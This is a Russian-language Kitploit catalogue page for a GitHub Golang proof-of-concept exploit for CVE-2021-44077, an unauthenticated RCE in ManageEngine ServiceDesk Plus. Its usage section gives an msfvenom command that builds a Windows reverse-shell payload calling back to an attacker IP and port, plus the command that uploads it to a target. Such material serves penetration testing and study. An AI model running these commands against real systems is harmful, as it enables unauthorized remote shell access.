Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Golang-CVE-2021-44077-POC — Эксплойт доказательства концепции на Golang для CVE-2021-44077: PreAuth RCE в ManageEngine ServiceDesk Plus < 11306 | Kitploit
Инструменты/GitHubGitHub/pizza-power/golang-cve-2021-44077-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubpizza-power/golang-cve-2021-44077-poc

Golang-CVE-2021-44077-POC

Эксплойт доказательства концепции на Golang для CVE-2021-44077: PreAuth RCE в ManageEngine ServiceDesk Plus < 11306

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
23 лет назадЕщё не проверено

Golang-CVE-2021-44077-POC

Этот эксплойт представляет собой неавторизованный RCE в Zoho ManageEngine ServiceDesk Plus < 11306.

Вы можете найти уязвимую версию ПО здесь: http://archives.manageengine.com/service-desk/11303/ManageEngine_ServiceDesk_Plus_64bit.exe

Я не смог найти версию на Golang для этого, поэтому вот она. Мой код не идеален, так что действуйте на свой страх и риск.

Пост в блоге:

https://www.pizzapower.me/2022/09/29/golang-proof-of-concept-exploit-for-cve-2021-44077-preauth-rce-in-manageengine-servicedesk-plus-11306/

Запуск

Создайте вредоносную нагрузку в вашей текущей директории.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > msiexec.exe

Затем запустите эксплойт.

go run CVE-2021-44077.go -u "http://192.168.1.3:8080/" -f "/msiexec.exe"

-u — это URL уязвимой цели -f — ваш вредоносный файл

Скачать инструмент